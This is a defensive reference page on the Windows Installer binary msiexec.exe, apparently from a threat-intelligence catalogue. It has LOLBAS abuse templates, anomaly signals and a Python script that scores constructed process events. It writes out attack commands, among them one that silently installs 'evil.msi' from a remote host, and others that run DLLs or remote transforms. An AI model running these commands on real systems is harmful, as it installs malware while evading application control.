Process

unknown

msiexec.exe

msiexec.exe is the Windows Installer, the engine that installs, repairs, and removes software packaged as MSI files. It runs constantly and legitimately whenever software is installed or updated. Attackers abuse it to install malicious packages and to run a remote MSI or DLL through a trusted, signed binary.

File identity

File details

Not observed.

Signing information

Not observed.

File version (0)

Not observed.

File size (0)

Not observed.

Execution context

File paths (0)

Not observed.

User context (0)

Not observed.

Integrity level (0)

Not observed.

Instances (0)

Not observed.

Session (0)

Not observed.

Token privileges (0)

Not observed.

Ancestry

Parents (0)

Not observed.

Children (0)

Not observed.

Grandparents (0)

Not observed.

Grandchildren (0)

Not observed.

Behavior

Loaded modules (0)

Not observed.

Named pipes (0)

Not observed.

Process handles (0)

Not observed.

Command-line patterns (0)

Not observed.

LOLBAS (5)
  • msiexec /quiet /i {PATH:.msi} (Execute): Execute custom-made MSI file with attack code
  • msiexec /q /i {REMOTEURL} (Execute): Execute custom-made MSI file with attack code from a remote server
  • msiexec /y {PATH_ABSOLUTE:.dll} (Execute): Execute DLL files
  • msiexec /z {PATH_ABSOLUTE:.dll} (Execute): Execute DLL files
  • msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb (Execute): Install a trusted, signed MSI file with additional attack code supplied as a transform file from a remote server

Indicators

Hashes

Not observed.

Analysis

About this process

msiexec.exe processes Windows Installer packages (.msi) and patches (.msp), carrying out the install, repair, and uninstall actions they define. It can install from a local file or directly from a URL, and a package can include custom actions that run programs or scripts as part of installation. The genuine binary lives at C:\Windows\System32\msiexec.exe, and it runs both as a per-invocation client and as the long-running Windows Installer service.

Legitimately, msiexec is one of the most common ways software is installed and updated, so the process itself is unremarkable. The package it is handed, where that package came from, and any custom action it runs are what give an instance meaning.

Security notes

msiexec.exe is a system-binary proxy and a software-deployment vector (T1218.007). Because a package can run custom actions and msiexec will install straight from a URL, an attacker can run msiexec /i https://host/evil.msi /qn to fetch and silently install a malicious package (T1105), or wrap a payload DLL or script in an MSI's custom actions, all under a trusted, signed Microsoft process that application-control rules tend to allow.

Because legitimate installs look similar, the context is what matters: an MSI pulled from a URL or a temp folder, a silent install (/qn) launched by an Office document or a script host, or msiexec spawning a shell. A normal software update does none of those.

Anomaly signals (5)
  • [high] Image path other than C:\Windows\System32\msiexec.exe
  • [high] Installing a package directly from a URL (msiexec /i https://...)
  • [high] Parent is an Office application, a script host, or an unfamiliar process
  • [high] msiexec spawning a shell or making unexpected outbound connections
  • [med] A package in a user-writable path (Temp, AppData, Downloads)

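To make the anomaly list above concrete, here is an added Python example that scores constructed msiexec process-creation events against those signals and the LOLBAS patterns listed earlier. It is not code from this page or from any vendor. The event field layout, the parent and shell name lists, the signal names, the "low" severity given to a silent-install flag, and the sample events are all my own assumptions; the SysWOW64 path in the genuine-image set is the 32-bit Windows Installer client on 64-bit Windows, an addition beyond the single path the page names.

```python
import re
from dataclasses import dataclass

# Known-good locations of the Windows Installer client. The page names the
# System32 path; the SysWOW64 copy is the 32-bit client on 64-bit Windows
# (an addition beyond the page's list).
GENUINE_IMAGES = {
    r"c:\windows\system32\msiexec.exe",
    r"c:\windows\syswow64\msiexec.exe",
}
# Parents the anomaly list calls out: Office applications and script hosts
# (assumed list, not exhaustive).
OFFICE_OR_SCRIPT_HOSTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Command-line patterns drawn from the page's anomaly and LOLBAS entries.
REMOTE_PACKAGE = re.compile(r'/i\s+"?https?://', re.IGNORECASE)
REMOTE_TRANSFORM = re.compile(r'TRANSFORMS="?https?://', re.IGNORECASE)
DLL_ACTION = re.compile(r'/[yz]\s+"?[^"\s]+\.dll', re.IGNORECASE)   # /y or /z with a DLL
USER_WRITABLE = re.compile(r'\\(?:temp|appdata|downloads)\\', re.IGNORECASE)
SILENT = re.compile(r'(?:^|\s)/(?:qn|q|quiet)(?=\s|$)', re.IGNORECASE)  # /qb is not silent

SEVERITY_RANK = {"none": 0, "low": 1, "med": 2, "high": 3}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed layout, not a real EDR schema)."""
    image: str
    cmdline: str
    parent: str
    children: tuple = ()


def evaluate(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (signal, severity) pairs for one msiexec process-creation event."""
    hits = []
    if ev.image.lower() not in GENUINE_IMAGES:
        hits.append(("image_path_not_genuine", "high"))
    if REMOTE_PACKAGE.search(ev.cmdline) or REMOTE_TRANSFORM.search(ev.cmdline):
        hits.append(("package_or_transform_from_url", "high"))
    if ev.parent.lower() in OFFICE_OR_SCRIPT_HOSTS:
        hits.append(("office_or_script_parent", "high"))
    if any(c.lower() in SHELLS for c in ev.children):
        hits.append(("spawns_shell", "high"))
    if USER_WRITABLE.search(ev.cmdline):
        hits.append(("package_in_user_writable_path", "med"))
    if DLL_ACTION.search(ev.cmdline):
        hits.append(("dll_via_y_or_z", "med"))
    if SILENT.search(ev.cmdline):
        # Context only: silent installs are routine unless combined with the above.
        hits.append(("silent_install", "low"))
    return hits


def highest(hits: list[tuple[str, str]]) -> str:
    """Highest severity among the hits, or 'none'."""
    return max((sev for _, sev in hits), key=SEVERITY_RANK.get, default="none")


# Constructed sample events; none of these are real telemetry.
SAMPLE_EVENTS = {
    "vendor_update": ProcEvent(
        image=r"C:\Windows\System32\msiexec.exe",
        cmdline=r'msiexec.exe /i "C:\Program Files\ExampleVendor\update.msi" /qn',
        parent="updater.exe"),
    "office_remote_install": ProcEvent(
        image=r"C:\Windows\System32\msiexec.exe",
        cmdline=r"msiexec /q /i https://example.invalid/pkg.msi",
        parent="WINWORD.EXE", children=("cmd.exe",)),
    "temp_package": ProcEvent(
        image=r"C:\Windows\System32\msiexec.exe",
        cmdline=r'msiexec /i "C:\Users\alice\AppData\Local\Temp\tool.msi" /qb',
        parent="explorer.exe"),
    "copied_binary_dll": ProcEvent(
        image=r"C:\Users\alice\Downloads\msiexec.exe",
        cmdline=r"msiexec /y C:\Users\alice\Downloads\helper.dll",
        parent="cmd.exe"),
}


def triage(events: dict) -> dict:
    """Map each event name to (highest severity, list of signal names)."""
    return {name: (highest(evaluate(ev)), [s for s, _ in evaluate(ev)])
            for name, ev in events.items()}


if __name__ == "__main__":
    for name, (sev, signals) in triage(SAMPLE_EVENTS).items():
        print(f"{name:24} {sev:5} {', '.join(signals) or '-'}")
```

The routine vendor update scores only the "low" context flag, which matches the page's point that the process itself is unremarkable and the package, its origin and its parent carry the meaning. Image path and parent name come from process-creation telemetry; the "spawns a shell" signal needs the child list from the same source, and the "unexpected outbound connections" half of that signal is not covered here because it needs network telemetry rather than a single event.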
Telemetry

OS prevalence (0)

Not observed.

Observation timeline

Not observed.

References
